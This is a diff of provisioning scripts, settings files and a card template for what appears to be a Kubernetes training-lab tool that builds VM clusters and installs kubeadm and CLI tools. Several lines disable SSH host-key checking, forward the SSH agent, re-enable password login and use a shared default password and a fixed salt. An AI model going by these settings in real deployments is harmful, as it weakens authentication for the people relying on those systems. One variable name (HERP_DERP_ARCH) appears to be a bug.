echo $PROVIDER > tags/$TAG/provider
@@ -314,12 +256,21 @@ _cmd_create() {
terraform init
echo tag = \"$TAG\" >> terraform.tfvars
echo how_many_clusters = $STUDENTS >> terraform.tfvars
if [ "$CLUSTERSIZE" ]; then
echo nodes_per_cluster = $CLUSTERSIZE >> terraform.tfvars
echo nodes_per_cluster = $CLUSTERSIZE >> terraform.tfvars
for RETRY in 1 2 3; do
if terraform apply -auto-approve; then
touch terraform.ok
break
fi
done
if ! [ -f terraform.ok ]; then
die "Terraform failed."
fi
)
sep
info "Successfully created $COUNT instances with tag $TAG"
echo create_ok > tags/$TAG/status
# If the settings.env file has a "STEPS" field,
# automatically execute all the actions listed in that field.
@@ -369,11 +320,10 @@ _cmd_clusterize() {
pssh "
set -e
grep PSSH_ /etc/ssh/sshd_config || echo 'AcceptEnv PSSH_*' | sudo tee -a /etc/ssh/sshd_config
grep KUBECOLOR_ /etc/ssh/sshd_config || echo 'AcceptEnv KUBECOLOR_*' | sudo tee -a /etc/ssh/sshd_config
sudo systemctl restart ssh.service"
pssh -I < tags/$TAG/clusters.tsv "
grep -w \$PSSH_HOST | tr '\t' '\n' > /tmp/cluster"
pssh -I < tags/$TAG/clusters.txt "
grep -w \$PSSH_HOST | tr ' ' '\n' > /tmp/cluster"
pssh "
echo \$PSSH_HOST > /tmp/ipv4
head -n 1 /tmp/cluster | sudo tee /etc/ipv4_of_first_node
@@ -394,14 +344,6 @@ _cmd_clusterize() {
done < /tmp/cluster
"
jq --raw-input --compact-output \
--arg USER_LOGIN "$USER_LOGIN" --arg USER_PASSWORD "$USER_PASSWORD" '
{
"login": $USER_LOGIN,
"password": $USER_PASSWORD,
"ipaddrs": .
}' < tags/$TAG/clusters.tsv > tags/$TAG/logins.jsonl
echo cluster_ok > tags/$TAG/status
}
@@ -449,7 +391,7 @@ _cmd_docker() {
##VERSION## https://github.com/docker/compose/releases
COMPOSE_VERSION=v2.11.1
COMPOSE_PLATFORM='linux-$(uname -m)'
# Just in case you need Compose 1.X, you can use the following lines.
# (But it will probably only work for x86_64 machines.)
#COMPOSE_VERSION=1.29.2
@@ -478,23 +420,10 @@ _cmd_kubebins() {
TAG=$1
need_tag
if [ "$KUBEVERSION" = "" ]; then
KUBEVERSION="$(curl -fsSL https://cdn.dl.k8s.io/release/stable.txt | sed s/^v//)"
fi
##VERSION##
case "$KUBEVERSION" in
1.19.*)
ETCD_VERSION=v3.4.13
CNI_VERSION=v0.8.7
;;
*)
ETCD_VERSION=v3.5.10
CNI_VERSION=v1.3.0
;;
esac
K8SBIN_VERSION="v$KUBEVERSION"
ETCD_VERSION=v3.4.13
K8SBIN_VERSION=v1.19.11 # Can't go to 1.20 because it requires a serviceaccount signing key.
CNI_VERSION=v0.8.7
ARCH=${ARCHITECTURE-amd64}
pssh --timeout 300 "
set -e
@@ -518,41 +447,30 @@ _cmd_kubebins() {
"
}
_cmd kubepkgs "Install Kubernetes packages (kubectl, kubeadm, kubelet)"
_cmd_kubepkgs() {
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
_cmd_kube() {
TAG=$1
need_tag
# Prior to September 2023, there was a single Kubernetes package repo that
# contained packages for all versions, so we could just add that repo
# and install whatever was the latest version available there.
# Things have changed (versions after September 2023, e.g. 1.28.3 are
# not in the old repo) and now there is a different repo for each
# minor version, so we need to figure out what minor version we are
# installing to add the corresponding repo.
if [ "$KUBEVERSION" = "" ]; then
KUBEVERSION="$(curl -fsSL https://cdn.dl.k8s.io/release/stable.txt | sed s/^v//)"
fi
KUBEREPOVERSION="$(echo $KUBEVERSION | cut -d. -f1-2)"
# Since the new repo doesn't have older versions, add a safety check here.
MINORVERSION="$(echo $KUBEVERSION | cut -d. -f2)"
if [ "$MINORVERSION" -lt 24 ]; then
die "Cannot install kubepkgs for versions before 1.24."
fi
pssh "
sudo tee /etc/apt/preferences.d/kubernetes <<EOF
if [ "$KUBEVERSION" ]; then
CLUSTER_CONFIGURATION_KUBERNETESVERSION='kubernetesVersion: "v'$KUBEVERSION'"'
pssh "
sudo tee /etc/apt/preferences.d/kubernetes <<EOF
Package: kubectl kubeadm kubelet
Pin: version $KUBEVERSION-*
Pin-Priority: 1000
EOF"
fi
# As of February 27th, 2023, packages.cloud.google.com seems broken
# (serves HTTP 500 errors for the GPG key), so let's pre-load that key.
pssh -I "sudo apt-key add -" < lib/kubernetes-apt-key.gpg
# Install packages
pssh --timeout 200 "
curl -fsSL https://pkgs.k8s.io/core:/stable:/v$KUBEREPOVERSION/deb/Release.key |
gpg --dearmor | sudo tee /etc/apt/keyrings/kubernetes-apt-keyring.gpg &&
echo 'deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v$KUBEREPOVERSION/deb/ /' |
#curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
#sudo apt-key add - &&
echo deb http://apt.kubernetes.io/ kubernetes-xenial main |
sudo tee /etc/apt/sources.list.d/kubernetes.list"
pssh --timeout 200 "
sudo apt-get update -q &&
@@ -560,21 +478,8 @@ EOF"
sudo apt-mark hold kubelet kubeadm kubectl &&
kubeadm completion bash | sudo tee /etc/bash_completion.d/kubeadm &&
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl &&
echo 'alias k=kubecolor' | sudo tee /etc/bash_completion.d/k &&
echo 'alias k=kubectl' | sudo tee /etc/bash_completion.d/k &&
echo 'complete -F __start_kubectl k' | sudo tee -a /etc/bash_completion.d/k"
}
_cmd kubeadm "Setup kubernetes clusters with kubeadm"
_cmd_kubeadm() {
TAG=$1
need_tag
if [ "$KUBEVERSION" ]; then
CLUSTER_CONFIGURATION_KUBERNETESVERSION='kubernetesVersion: "v'$KUBEVERSION'"'
IGNORE_SYSTEMVERIFICATION="- SystemVerification"
IGNORE_SWAP="- Swap"
IGNORE_IPTABLES="- FileContent--proc-sys-net-bridge-bridge-nf-call-iptables"
fi
# Install a valid configuration for containerd
# (first, the CRI interface needs to be re-enabled;
@@ -595,9 +500,6 @@ bootstrapTokens:
nodeRegistration:
ignorePreflightErrors:
- NumCPU
$IGNORE_SYSTEMVERIFICATION
$IGNORE_SWAP
$IGNORE_IPTABLES
---
kind: JoinConfiguration
apiVersion: kubeadm.k8s.io/v1beta3
@@ -609,9 +511,6 @@ discovery:
nodeRegistration:
ignorePreflightErrors:
- NumCPU
$IGNORE_SYSTEMVERIFICATION
$IGNORE_SWAP
$IGNORE_IPTABLES
---
kind: KubeletConfiguration
apiVersion: kubelet.config.k8s.io/v1beta1
@@ -640,9 +539,7 @@ EOF
# Install weave as the pod network
pssh "
if i_am_first_node; then
curl -fsSL https://github.com/weaveworks/weave/releases/download/v2.8.1/weave-daemonset-k8s-1.11.yaml |
sed s,weaveworks/weave,quay.io/rackspace/weave, |
kubectl apply -f-
kubectl apply -f https://github.com/weaveworks/weave/releases/download/v2.8.1/weave-daemonset-k8s-1.11.yaml
fi"
# FIXME this is a gross hack to add the deployment key to our SSH agent,
@@ -696,31 +593,6 @@ _cmd_kubetools() {
;;
esac
# Install ArgoCD CLI
##VERSION## https://github.com/argoproj/argo-cd/releases/latest
URL=https://github.com/argoproj/argo-cd/releases/latest/download/argocd-linux-${ARCH}
pssh "
if [ ! -x /usr/local/bin/argocd ]; then
sudo curl -o /usr/local/bin/argocd -fsSL $URL
sudo chmod +x /usr/local/bin/argocd
argocd completion bash | sudo tee /etc/bash_completion.d/argocd
argocd version --client
fi"
# Install Flux CLI
##VERSION## https://github.com/fluxcd/flux2/releases
FLUX_VERSION=2.3.0
FILENAME=flux_${FLUX_VERSION}_linux_${ARCH}
URL=https://github.com/fluxcd/flux2/releases/download/v$FLUX_VERSION/$FILENAME.tar.gz
pssh "
if [ ! -x /usr/local/bin/flux ]; then
curl -fsSL $URL |
sudo tar -C /usr/local/bin -zx flux
sudo chmod +x /usr/local/bin/flux
flux completion bash | sudo tee /etc/bash_completion.d/flux
flux --version
fi"
# Install kubectx and kubens
pssh "
set -e
@@ -752,7 +624,7 @@ EOF
# Install stern
##VERSION## https://github.com/stern/stern/releases
STERN_VERSION=1.29.0
STERN_VERSION=1.22.0
FILENAME=stern_${STERN_VERSION}_linux_${ARCH}
URL=https://github.com/stern/stern/releases/download/v$STERN_VERSION/$FILENAME.tar.gz
pssh "
@@ -774,7 +646,7 @@ EOF
# Install kustomize
##VERSION## https://github.com/kubernetes-sigs/kustomize/releases
KUSTOMIZE_VERSION=v5.4.1
KUSTOMIZE_VERSION=v4.5.7
URL=https://github.com/kubernetes-sigs/kustomize/releases/download/kustomize/${KUSTOMIZE_VERSION}/kustomize_${KUSTOMIZE_VERSION}_linux_${ARCH}.tar.gz
pssh "
if [ ! -x /usr/local/bin/kustomize ]; then
@@ -805,16 +677,6 @@ EOF
aws-iam-authenticator version
fi"
# Install jless (jless.io)
pssh "
if [ ! -x /usr/local/bin/jless ]; then
##VERSION##
sudo apt-get install -y libxcb-render0 libxcb-shape0 libxcb-xfixes0
wget https://github.com/PaulJuliusMartinez/jless/releases/download/v0.9.0/jless-v0.9.0-x86_64-unknown-linux-gnu.zip
unzip jless-v0.9.0-x86_64-unknown-linux-gnu
sudo mv jless /usr/local/bin
fi"
# Install the krew package manager
pssh "
if [ ! -d /home/$USER_LOGIN/.krew ]; then
@@ -826,31 +688,21 @@ EOF
echo export PATH=/home/$USER_LOGIN/.krew/bin:\\\$PATH | sudo -u $USER_LOGIN tee -a /home/$USER_LOGIN/.bashrc
fi"
# Install kubecolor
KUBECOLOR_VERSION=0.4.0
URL=https://github.com/kubecolor/kubecolor/releases/download/v${KUBECOLOR_VERSION}/kubecolor_${KUBECOLOR_VERSION}_linux_${ARCH}.tar.gz
pssh "
if [ ! -x /usr/local/bin/kubecolor ]; then
##VERSION##
curl -fsSL $URL |
sudo tar -C /usr/local/bin -zx kubecolor
fi"
# Install k9s
pssh "
if [ ! -x /usr/local/bin/k9s ]; then
FILENAME=k9s_Linux_$ARCH.tar.gz &&
curl -fsSL https://github.com/derailed/k9s/releases/latest/download/\$FILENAME |
sudo tar -C /usr/local/bin -zx k9s
sudo tar -zxvf- -C /usr/local/bin k9s
k9s version
fi"
# Install popeye
pssh "
if [ ! -x /usr/local/bin/popeye ]; then
FILENAME=popeye_Linux_$ARCH.tar.gz &&
FILENAME=popeye_Linux_$HERP_DERP_ARCH.tar.gz &&
curl -fsSL https://github.com/derailed/popeye/releases/latest/download/\$FILENAME |
sudo tar -C /usr/local/bin -zx popeye
sudo tar -zxvf- -C /usr/local/bin popeye
popeye version
fi"
@@ -860,10 +712,10 @@ EOF
# But the install script is not arch-aware (see https://github.com/tilt-dev/tilt/pull/5050).
pssh "
if [ ! -x /usr/local/bin/tilt ]; then
TILT_VERSION=0.33.13
TILT_VERSION=0.22.15
FILENAME=tilt.\$TILT_VERSION.linux.$TILT_ARCH.tar.gz
curl -fsSL https://github.com/tilt-dev/tilt/releases/download/v\$TILT_VERSION/\$FILENAME |
sudo tar -C /usr/local/bin -zx tilt
sudo tar -zxvf- -C /usr/local/bin tilt
tilt completion bash | sudo tee /etc/bash_completion.d/tilt
tilt version
fi"
@@ -905,8 +757,7 @@ EOF
fi"
##VERSION## https://github.com/bitnami-labs/sealed-secrets/releases
KUBESEAL_VERSION=0.26.2
URL=https://github.com/bitnami-labs/sealed-secrets/releases/download/v${KUBESEAL_VERSION}/kubeseal-${KUBESEAL_VERSION}-linux-${ARCH}.tar.gz
KUBESEAL_VERSION=0.17.4
#case $ARCH in
#amd64) FILENAME=kubeseal-linux-amd64;;
#arm64) FILENAME=kubeseal-arm64;;
@@ -914,13 +765,13 @@ EOF
#esac
pssh "
if [ ! -x /usr/local/bin/kubeseal ]; then
curl -fsSL $URL |
sudo tar -C /usr/local/bin -zx kubeseal
curl -fsSL https://github.com/bitnami-labs/sealed-secrets/releases/download/v$KUBESEAL_VERSION/kubeseal-$KUBESEAL_VERSION-linux-$ARCH.tar.gz |
sudo tar -zxvf- -C /usr/local/bin kubeseal
kubeseal --version
fi"
##VERSION## https://github.com/vmware-tanzu/velero/releases
VELERO_VERSION=1.13.2
VELERO_VERSION=1.11.0
pssh "
if [ ! -x /usr/local/bin/velero ]; then
curl -fsSL https://github.com/vmware-tanzu/velero/releases/download/v$VELERO_VERSION/velero-v$VELERO_VERSION-linux-$ARCH.tar.gz |
@@ -930,21 +781,13 @@ EOF
fi"
##VERSION## https://github.com/doitintl/kube-no-trouble/releases
KUBENT_VERSION=0.7.2
KUBENT_VERSION=0.7.0
pssh "
if [ ! -x /usr/local/bin/kubent ]; then
curl -fsSL https://github.com/doitintl/kube-no-trouble/releases/download/${KUBENT_VERSION}/kubent-${KUBENT_VERSION}-linux-$ARCH.tar.gz |
sudo tar -zxvf- -C /usr/local/bin kubent
kubent --version
fi"
# Ngrok. Note that unfortunately, this is the x86_64 binary.
# We might have to rethink how to handle this for multi-arch environments.
pssh "
if [ ! -x /usr/local/bin/ngrok ]; then
curl -fsSL https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz |
sudo tar -zxvf- -C /usr/local/bin ngrok
fi"
}
_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
@@ -992,15 +835,6 @@ _cmd_inventory() {
FIXME
}
_cmd logins "Show login information for a group of instances"
_cmd_logins() {
TAG=$1
need_tag $TAG
cat tags/$TAG/logins.jsonl \
| jq -r '"\(if .codeServerPort then "\(.codeServerPort)\t" else "" end )\(.password)\tssh -l \(.login)\(if .port then " -p \(.port)" else "" end)\t\(.ipaddrs)"'
}
_cmd maketag "Generate a quasi-unique tag for a group of instances"
_cmd_maketag() {
if [ -z $USER ]; then
@@ -1051,9 +885,6 @@ _cmd_stage2() {
cd tags/$TAG/stage2
terraform init -upgrade
terraform apply -auto-approve
terraform output -raw logins_jsonl > ../logins.jsonl
terraform output -raw ips_txt > ../ips.txt
echo "stage2_ok" > status
}
_cmd standardize "Deal with non-standard Ubuntu cloud images"
@@ -1090,19 +921,12 @@ _cmd_standardize() {
# Disable unattended upgrades so that they don't mess up with the subsequent steps
pssh sudo rm -f /etc/apt/apt.conf.d/50unattended-upgrades
# Some cloud providers think that it's smart to disable password authentication.
# We need to re-enable it, though.
# Digital Ocean
# Digital Ocean's cloud init disables password authentication; re-enable it.
pssh "
if [ -f /etc/ssh/sshd_config.d/50-cloud-init.conf ]; then
sudo rm /etc/ssh/sshd_config.d/50-cloud-init.conf
sudo systemctl restart ssh.service
fi"
# AWS
pssh "if [ -f /etc/ssh/sshd_config.d/60-cloudimg-settings.conf ]; then
sudo rm /etc/ssh/sshd_config.d/60-cloudimg-settings.conf
sudo systemctl restart ssh.service
fi"
# Special case for oracle since their iptables blocks everything but SSH
pssh "
@@ -1138,12 +962,11 @@ _cmd_tailhist () {
# halfway through and we're actually trying to download it again.
pssh "
set -e
sudo apt-get install unzip -y
wget -c https://github.com/joewalnes/websocketd/releases/download/v0.3.0/websocketd-0.3.0-linux_$ARCH.zip
unzip -o websocketd-0.3.0-linux_$ARCH.zip websocketd
unzip websocketd-0.3.0-linux_$ARCH.zip websocketd
sudo mv websocketd /usr/local/bin/websocketd
sudo mkdir -p /opt/tailhist
sudo tee /opt/tailhist.service <<EOF
sudo mkdir -p /tmp/tailhist
sudo tee /root/tailhist.service <<EOF
[Unit]
Description=tailhist
@@ -1151,36 +974,16 @@ Description=tailhist
WantedBy=multi-user.target
[Service]
WorkingDirectory=/opt/tailhist
WorkingDirectory=/tmp/tailhist
ExecStart=/usr/local/bin/websocketd --port=1088 --staticdir=. sh -c \"tail -n +1 -f /home/$USER_LOGIN/.history || echo 'Could not read history file. Perhaps you need to \\\"chmod +r .history\\\"?'\"
User=nobody
Group=nogroup
Restart=always
EOF
sudo systemctl enable /opt/tailhist.service --now
sudo systemctl enable /root/tailhist.service --now
"
pssh -I sudo tee /opt/tailhist/index.html <lib/tailhist.html
}
_cmd terraform "Apply Terraform configuration to provision resources."
_cmd_terraform() {
TAG=$1
need_tag
echo terraforming > tags/$TAG/status
(
cd tags/$TAG
terraform apply -auto-approve
# The Terraform provider for Proxmox has a bug; sometimes it fails
# to obtain the VM address from the QEMU agent. In that case, we put
# ERROR in the ips.txt file (instead of the VM IP address). Detect
# that so that we run Terraform again (this typically solves the issue).
if grep -q ERROR ips.txt; then
die "Couldn't obtain IP address of some machines. Try to re-run terraform."
fi
)
echo terraformed > tags/$TAG/status
pssh -I sudo tee /tmp/tailhist/index.html <lib/tailhist.html
}
_cmd tools "Install a bunch of useful tools (editors, git, jq...)"
@@ -1189,9 +992,8 @@ _cmd_tools() {
need_tag
pssh "
set -e
sudo apt-get -q update
sudo apt-get -qy install apache2-utils argon2 emacs-nox git httping htop jid joe jq mosh tree unzip
sudo apt-get -qy install apache2-utils emacs-nox git httping htop jid joe jq mosh python-setuptools tree unzip
# This is for VMs with broken PRNG (symptom: running docker-compose randomly hangs)
sudo apt-get -qy install haveged
"
@@ -1238,17 +1040,14 @@ fi
"
}
_cmd ssh "Open an SSH session to a node (first one by default)"
_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
TAG=$1
need_tag
if [ "$2" ]; then
ssh -l ubuntu -i tags/$TAG/id_rsa $2
else
IP=$(head -1 tags/$TAG/ips.txt)
info "Logging into $IP (default password: $USER_PASSWORD)"
ssh $SSHOPTS $USER_LOGIN@$IP
fi
IP=$(head -1 tags/$TAG/ips.txt)
info "Logging into $IP (default password: $USER_PASSWORD)"
ssh $SSHOPTS $USER_LOGIN@$IP
}
_cmd tags "List groups of VMs known locally"
@@ -1257,8 +1056,8 @@ _cmd_tags() {
cd tags
echo "[#] [Status] [Tag] [Mode] [Provider]"
for tag in *; do
if [ -f $tag/logins.jsonl ]; then
count="$(wc -l < $tag/logins.jsonl)"
if [ -f $tag/ips.txt ]; then
count="$(wc -l < $tag/ips.txt)"
else
count="?"
fi
@@ -1334,13 +1133,7 @@ _cmd_passwords() {
$0 ips "$TAG" | paste "$PASSWORDS_FILE" - | while read password nodes; do
info "Setting password for $nodes..."
for node in $nodes; do
echo $USER_LOGIN $password | ssh $SSHOPTS -i tags/$TAG/id_rsa ubuntu@$node '
read login password
echo $login:$password | sudo chpasswd
hashedpassword=$(echo -n $password | argon2 saltysalt$RANDOM -e)
sudo -u $login mkdir -p /home/$login/.config/code-server
echo "hashed-password: \"$hashedpassword\"" | sudo -u $login tee /home/$login/.config/code-server/config.yaml >/dev/null
'
echo $USER_LOGIN:$password | ssh $SSHOPTS -i tags/$TAG/id_rsa ubuntu@$node sudo chpasswd
done
done
info "Done."
@@ -1372,11 +1165,6 @@ _cmd_wait() {
pssh -l $SSH_USER "
if [ -d /var/lib/cloud ]; then
cloud-init status --wait
case $? in
0) exit 0;; # all is good
2) exit 0;; # recoverable error (happens with proxmox deprecated cloud-init payloads)
*) exit 1;; # all other problems
esac
fi"
}
@@ -1419,7 +1207,7 @@ WantedBy=multi-user.target
[Service]
WorkingDirectory=/opt/webssh
ExecStart=/usr/bin/env python3 run.py --fbidhttp=false --port=1080 --policy=reject
ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
User=nobody
Group=nogroup
Restart=always
@@ -1432,7 +1220,7 @@ EOF"
_cmd www "Run a web server to access card HTML and PDF"
_cmd_www() {
cd www
IPADDR=$(curl -fsSL canihazip.com/s || echo localhost)
IPADDR=$(curl -sL canihazip.com/s)
info "The following files are available:"
for F in *; do
echo "http://$IPADDR:8000/$F"


@@ -1,22 +1,32 @@
#!/usr/bin/env python3
import json
import os
import sys
import yaml
import jinja2
# Read settings from user-provided settings file
context = yaml.safe_load(open(sys.argv[1]))
context["logins"] = []
for line in open("logins.jsonl"):
if line.strip():
context["logins"].append(json.loads(line))
ips = list(open("ips.txt"))
clustersize = context["clustersize"]
print("---------------------------------------------")
print(" Number of cards: {}".format(len(context["logins"])))
print(" Number of IPs: {}".format(len(ips)))
print(" VMs per cluster: {}".format(clustersize))
print("---------------------------------------------")
assert len(ips)%clustersize == 0
clusters = []
while ips:
cluster = ips[:clustersize]
ips = ips[clustersize:]
clusters.append(cluster)
context["clusters"] = clusters
template_file_name = context["cards_template"]
template_file_path = os.path.join(
os.path.dirname(__file__),
@@ -25,23 +35,23 @@ template_file_path = os.path.join(
template_file_name
)
template = jinja2.Template(open(template_file_path).read())
with open("cards.html", "w") as f:
f.write(template.render(**context))
print("Generated cards.html")
with open("ips.html", "w") as f:
f.write(template.render(**context))
print("Generated ips.html")
try:
import pdfkit
paper_size = context["paper_size"]
margin = {"A4": "0.5cm", "Letter": "0.2in"}[paper_size]
with open("cards.html") as f:
pdfkit.from_file(f, "cards.pdf", options={
with open("ips.html") as f:
pdfkit.from_file(f, "ips.pdf", options={
"page-size": paper_size,
"margin-top": margin,
"margin-bottom": margin,
"margin-left": margin,
"margin-right": margin,
})
print("Generated cards.pdf")
print("Generated ips.pdf")
except ImportError:
print("WARNING: could not import pdfkit; did not generate cards.pdf")
print("WARNING: could not import pdfkit; did not generate ips.pdf")

Binary file not shown.


@@ -17,20 +17,6 @@ pssh() {
echo "[parallel-ssh] $@"
# There are some routers that really struggle with the number of TCP
# connections that we open when deploying large fleets of clusters.
# We're adding a 1 second delay here, but this can be cranked up if
# necessary - or down to zero, too.
sleep ${PSSH_DELAY_PRE-1}
# When things go wrong, it's convenient to ask pssh to show the output
# of the failed command. Let's make that easy with a DEBUG env var.
if [ "$DEBUG" ]; then
PSSH_I=-i
else
PSSH_I=""
fi
$(which pssh || which parallel-ssh) -h $HOSTFILE -l ubuntu \
--par ${PSSH_PARALLEL_CONNECTIONS-100} \
--timeout 300 \
@@ -39,6 +25,5 @@ pssh() {
-O UserKnownHostsFile=/dev/null \
-O StrictHostKeyChecking=no \
-O ForwardAgent=yes \
$PSSH_I \
"$@"
}


@@ -1,16 +0,0 @@
#!/bin/sh
DOMAINS=domains.txt
IPS=ips.txt
. ./dns-cloudflare.sh
paste "$DOMAINS" "$IPS" | while read domain ips; do
if ! [ "$domain" ]; then
echo "⚠️ No more domains!"
exit 1
fi
_clear_zone "$domain"
_populate_zone "$domain" $ips
done
echo "✅ All done."


@@ -1,21 +1,21 @@
CLUSTERSIZE=3
CLUSTERSIZE=1
CLUSTERPREFIX=polykube
CLUSTERPREFIX=dmuc
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize
tools
kubepkgs
kubebins
docker
disabledocker
createuser
webssh
tailhist
kubebins
kubetools
ips
"


@@ -7,7 +7,6 @@ USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize


@@ -7,7 +7,6 @@ USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize


@@ -1,27 +0,0 @@
CLUSTERSIZE=1
CLUSTERPREFIX=monokube
# We're sticking to this in the first DMUC lab,
# because it still works with Docker, and doesn't
# require a ServiceAccount signing key.
KUBEVERSION=1.19.11
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize
tools
docker
disabledocker
createuser
webssh
tailhist
kubebins
kubetools
ips
"


@@ -7,10 +7,9 @@ USER_PASSWORD=training
# For a list of old versions, check:
# https://kubernetes.io/releases/patch-releases/#non-active-branch-history
KUBEVERSION=1.28.9
KUBEVERSION=1.22.5
STEPS="
terraform
wait
standardize
clusterize
@@ -19,8 +18,7 @@ STEPS="
createuser
webssh
tailhist
kubepkgs
kubeadm
kube
kubetools
kubetest
"


@@ -6,7 +6,6 @@ USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize
@@ -15,8 +14,7 @@ STEPS="
createuser
webssh
tailhist
kubepkgs
kubeadm
kube
kubetools
kubetest
"
"


@@ -6,7 +6,6 @@ USER_LOGIN=docker
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize
@@ -15,5 +14,6 @@ STEPS="
createuser
webssh
tailhist
cards
ips
"
"


@@ -1,6 +0,0 @@
CLUSTERSIZE=5
USER_LOGIN=k8s
USER_PASSWORD=
STEPS="terraform stage2"


@@ -6,7 +6,6 @@ USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize
@@ -15,8 +14,7 @@ STEPS="
createuser
webssh
tailhist
kubepkgs
kubeadm
kube
kubetools
kubetest
"
"


@@ -7,7 +7,6 @@ USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
terraform
wait
standardize
clusterize
@@ -16,8 +15,7 @@ STEPS="
createuser
webssh
tailhist
kubepkgs
kubeadm
kube
kubetools
kubetest
"


@@ -1,4 +1,6 @@
CLUSTERSIZE=2
USER_LOGIN=k8s
USER_PASSWORD=
STEPS="terraform stage2"
STEPS="stage2"


@@ -1,8 +1,3 @@
#export TF_VAR_node_size=GP4.4
#export TF_VAR_node_size=g6-standard-6
#export TF_VAR_node_size=m7i.xlarge
CLUSTERSIZE=1
CLUSTERPREFIX=CHANGEME
@@ -11,7 +6,6 @@ USER_LOGIN=portal
USER_PASSWORD=CHANGEME
STEPS="
terraform
wait
standardize
clusterize


@@ -7,7 +7,7 @@ STUDENTS=2
#export TF_VAR_location=eu-north-1
export TF_VAR_node_size=S
SETTINGS=admin-monokube
SETTINGS=admin-dmuc
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \
@@ -15,7 +15,15 @@ TAG=$PREFIX-$SETTINGS
--settings settings/$SETTINGS.env \
--students $STUDENTS
SETTINGS=admin-polykube
SETTINGS=admin-kubenet
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \
--provider $PROVIDER \
--settings settings/$SETTINGS.env \
--students $STUDENTS
SETTINGS=admin-kuberouter
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \


@@ -7,7 +7,7 @@
{%- set url = url
| default("http://FIXME.container.training/") -%}
{%- set pagesize = pagesize
| default(10) -%}
| default(9) -%}
{%- set lang = lang
| default("en") -%}
{%- set event = event
@@ -15,36 +15,79 @@
{%- set backside = backside
| default(False) -%}
{%- set image = image
| default(False) -%}
| default("kube") -%}
{%- set clusternumber = clusternumber
| default(None) -%}
{%- set thing = thing
| default("lab environment") -%}
{%- if lang == "en" -%}
{%- set intro -%}
Here is the connection information to your very own
{{ thing }} for this {{ event }}.
You can connect to it with any SSH client.
{%- endset -%}
{%- if qrcode == True -%}
{%- set qrcode = "https://container.training/q" -%}
{%- elif qrcode -%}
{%- set qrcode = qrcode -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
{{ thing }} pour cette formation.
Vous pouvez vous y connecter
avec n'importe quel client SSH.
{%- endset -%}
{# You can also set img_bottom_src instead. #}
{%- set img_logo_src = {
"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
"kube": "https://avatars1.githubusercontent.com/u/13629408",
"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
}[image] -%}
{%- if lang == "en" and clustersize == 1 -%}
{%- set intro -%}
Here is the connection information to your very own
machine for this {{ event }}.
You can connect to this VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machine is:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clustersize != 1 -%}
{%- set intro -%}
Here is the connection information to your very own
cluster for this {{ event }}.
You can connect to each VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machines are:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize == 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
machine pour cette formation.
Vous pouvez vous connecter à cette machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresse IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clusterprefix != "node" -%}
{%- set intro -%}
Here is the connection information for the
<strong>{{ clusterprefix }}</strong> environment.
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize != 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
cluster pour cette formation.
Vous pouvez vous connecter à chaque machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresses IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" -%}
{%- set slides_are_at -%}
You can find the slides at:
{%- endset -%}
{%- set slides_are_at -%}
You can find the slides at:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set slides_are_at -%}
Le support de formation est à l'adresse suivante :
{%- endset -%}
{%- set slides_are_at -%}
Le support de formation est à l'adresse suivante :
{%- endset -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
@@ -59,21 +102,25 @@
}
body {
/* this is A4 minus 0.5cm margins */
width: 20cm;
height: 28.7cm;
width: 20cm;
height: 28.7cm;
}
{% elif paper_size == "Letter" %}
@page {
size: Letter; /* 8.5in x 11in */
size: Letter;
margin: 0.2in;
}
body {
width: 6.75in; /* two cards wide */
margin-left: 0.875in; /* (8.5in - 6.75in)/2 */
margin-top: 0.1875in; /* (11in - 5 cards)/2 */
/* this is Letter minus 0.2in margins */
width: 8.6in;
height: 10.6in;
}
{% endif %}
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 15px;
font-family: 'Slabo 27px';
@@ -87,45 +134,47 @@ table {
padding-left: 0.4em;
}
td:first-child {
width: 10.5em;
}
div.card {
div {
float: left;
border: 0.01in dotted black;
border: 1px dotted black;
{% if backside %}
height: 33%;
{% endif %}
/* columns * (width+left+right) < 100% */
/*
columns * (width+left+right) < 100%
height: 33%;
width: 24.8%;
width: 33%;
width: 24.8%;
*/
